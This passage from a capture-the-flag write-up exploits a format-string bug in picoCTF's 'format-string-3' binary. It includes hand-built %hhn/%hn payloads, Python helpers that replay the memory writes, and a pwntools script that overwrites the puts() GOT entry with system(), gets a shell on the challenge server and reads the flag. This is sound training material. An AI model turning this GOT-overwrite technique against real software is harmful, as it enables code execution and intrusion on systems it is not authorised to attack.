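oO ?! Strangely, there's a stack smashing detection (see the output above), and the third byte of the entry is still e5. Looking closer, the third address in the payload is 0x404020, which is the __stack_chk_fail GOT entry according to the relocation records above, whereas the third byte of the puts() entry lives at 0x40401a. The entry therefore points to 0x7ffff7e5f760, an arbitrary location inside libc, which most likely explains the abort. Instead, we can also reduce our input's size by writing 0xe2f7
directly into 0x404019
, using %hn
(a 2-byte write covering 0x404019 and 0x40401a):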
jamarir@kali:~$ python -c 'print(f"+{0x60} -> +{0xe2f7 - 0x60}")'
+96 -> +58007
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%0000096c%42$hhn"+"%00058007c%43$hn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"');
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
[...] @@
We no longer get a segmentation fault! This is likely because our shell spawned, then exited as soon as it reached the end of stdin. Using the cat + pipe
trick keeps stdin open, which gives us an interactive shell to execute arbitrary commands:
jamarir@kali:~$ (python2 -c 'print"%0000096c%42$hhn"+"%00058007c%43$hn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"'; cat) |./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
[...] @@echo 'Hello World!'
Hello World!
^C
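Both attempts can be replayed offline to see what ends up in the puts() GOT entry. This is a simplified model (hypothetical simulate() helper): it only tracks the padding printed by each %c and the bytes stored by %hhn (1 byte) and %hn (2 bytes), starting from the value seen in gdb:

```python
import struct

PUTS_GOT = 0x404018

def simulate(writes, initial_puts):
    """Replay (pad, address, size) writes; return the final puts() GOT value."""
    memory = {PUTS_GOT + i: b for i, b in enumerate(struct.pack("<Q", initial_puts))}
    printed = 0
    for pad, address, size in writes:
        printed += pad                               # characters printed by %<pad>c
        value = printed % (1 << (8 * size))          # %hhn keeps 1 byte, %hn 2 bytes
        for i, b in enumerate(value.to_bytes(size, "little")):
            memory[address + i] = b
    return int.from_bytes(bytes(memory[PUTS_GOT + i] for i in range(8)), "little")

before = 0x7ffff7e59b00  # value seen in gdb (its lowest byte gets overwritten anyway)

three_hhn = [(96, 0x404018, 1), (151, 0x404019, 1), (235, 0x404020, 1)]
hhn_then_hn = [(96, 0x404018, 1), (58007, 0x404019, 2)]

print(hex(simulate(three_hhn, before)))    # 0x7ffff7e5f760
print(hex(simulate(hhn_then_hn, before)))  # 0x7ffff7e2f760
```

The first result is the value gdb reported after the three %hhn writes: the byte 0xe2 went to 0x404020 and never reached 0x40401a. The second result is the address of system() computed earlier.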
Pwntools’s fmtstr()
However, this payload won't work server-side, as ASLR is enabled. See that the libc's base changes between executions:
jamarir@kali:~$ echo test |nc rhea.picoctf.net 58731
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7cd79084a3f0
test
/bin/sh
jamarir@kali:~$ echo test |nc rhea.picoctf.net 58731
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x79ce907cc3f0
test
/bin/sh
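To make the problem concrete, here is a small sketch (hypothetical helper name) that parses the two banners above and derives the 3 lower bytes of system() that would have to be written in each run, assuming the server uses the provided libc.so.6:

```python
import re

SETVBUF_OFFSET = 0x7a3f0  # offsets taken from the provided libc.so.6
SYSTEM_OFFSET = 0x4f760

def system_from_banner(banner: bytes) -> int:
    """Extract the setvbuf leak from the banner and return system()'s address."""
    match = re.search(rb"setvbuf in libc: 0x([0-9a-f]+)", banner)
    if match is None:
        raise ValueError("no setvbuf leak found in banner")
    return int(match.group(1), 16) - SETVBUF_OFFSET + SYSTEM_OFFSET

banners = [
    b"Okay I'll be nice. Here's the address of setvbuf in libc: 0x7cd79084a3f0\n",
    b"Okay I'll be nice. Here's the address of setvbuf in libc: 0x79ce907cc3f0\n",
]
for banner in banners:
    print(hex(system_from_banner(banner) & 0xFFFFFF))
# 0x81f760
# 0x7a1760
```

Only the lowest 12 bits (0x760) stay constant, so the hard-coded increments from the local exploit cannot be reused.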
Therefore, we have to construct our payload on the fly, using the disclosed setvbuf
address. Fortunately, the pwntools
library can generate the format string payload dynamically for us.
First, we attach to the remote process and set the binary’s context:
import pwn
#p = pwn.process("./format-string-3")
p = pwn.remote("rhea.picoctf.net", 58731)
pwn.context.binary = pwn.ELF('./format-string-3')
Second, we grab the setvbuf() leaked address, and update the remote libc's base accordingly:
setvbuf_addr = int(p.recvregex(br'libc: 0x([0-9a-f]+)\n', capture=True).group(1), 16)
libc = pwn.ELF("./libc.so.6")
libc.address = setvbuf_addr - libc.symbols['setvbuf']
Third, we construct the format string payload to write system() into 0x404018, knowing that 38 stackpops are required (the first argument of fmtstr_payload() is the slot where our input starts). To avoid hard-coding 0x404018, we grab the puts GOT entry from the binary:
payload = pwn.fmtstr_payload(38, {pwn.context.binary.got['puts'] : libc.symbols['system']})
pwn.log.info(f"Payload: '{payload}'")
Finally, we send the payload in stdin and grab an interactive process session:
p.sendline(payload)
p.interactive()
GG WP !
jamarir@kali:~$ python fmt.py
[+] Opening connection to rhea.picoctf.net on port 58731: Done
[*] '/home/jamarir/[...]/format-string-3'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
[*] '/home/jamarir/[...]/libc.so.6'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
[*] Payload: 'b'%96c%47$lln%22c%48$hhn%17c%49$hhn%15c%50$hhn%60c%51$hhn%42c%52$hhnaaaaba\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00''
[*] Switching to interactive mode
c \x8b 0 \x01 \x00 \x00aaaaba\x18@@$ l ls ls
Makefile
artifacts.tar.gz
flag.txt
format-string-3
format-string-3.c
ld-linux-x86-64.so.2
libc.so.6
metadata.json
profile
$ cat flag.txt
picoCTF{G0[...]f5}$
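The payload printed by pwntools can be decoded by hand to check that it follows the same logic as our manual one. The sketch below (hypothetical decode() helper) assumes our input starts at slot 38 and only understands the %Nc%M$hhn / %M$hn / %M$lln pairs that appear in this payload:

```python
import re
import struct

BUF_SLOT = 38  # slot where our input starts in format-string-3

payload = (
    b"%96c%47$lln%22c%48$hhn%17c%49$hhn%15c%50$hhn%60c%51$hhn%42c%52$hhn"
    b"aaaaba"
    b"\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00"
    b"\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00"
    b"\x1b@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00"
)

SIZES = {b"hhn": 1, b"hn": 2, b"lln": 8}  # bytes stored by each specifier

def decode(payload, got_entry):
    """Replay the writes encoded in payload; return the 8 bytes left at got_entry."""
    memory = {}
    printed = 0
    for pad, slot, kind in re.findall(rb"%(\d+)c%(\d+)\$(hhn|hn|lln)", payload):
        printed += int(pad)
        # The slot number tells us which 8-byte chunk of the payload is the target.
        (address,) = struct.unpack_from("<Q", payload, (int(slot) - BUF_SLOT) * 8)
        size = SIZES[kind]
        data = (printed % (1 << (8 * size))).to_bytes(size, "little")
        for i, byte in enumerate(data):
            memory[address + i] = byte
    return int.from_bytes(bytes(memory[got_entry + i] for i in range(8)), "little")

written = decode(payload, 0x404018)
print(hex(written))                    # 0x76fcd2968760
print(hex((written - 0x4f760) & 0xFFF))  # 0x0
```

pwntools first clears the whole entry with a single %lln (writing 0x60), then sets bytes 1 to 5 with %hhn, ordered by increasing value so that each pad stays small. The "aaaaba" filler plays the role of our zero-padding: it aligns the addresses on slot 47. The leak for that particular run is not shown above, so the only check available is that the written address minus system()'s offset is page-aligned.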
Written by

jamarir
Jamaledine AMARIR. Pentester, CTF Player, Game Modding enthusiast | CRTO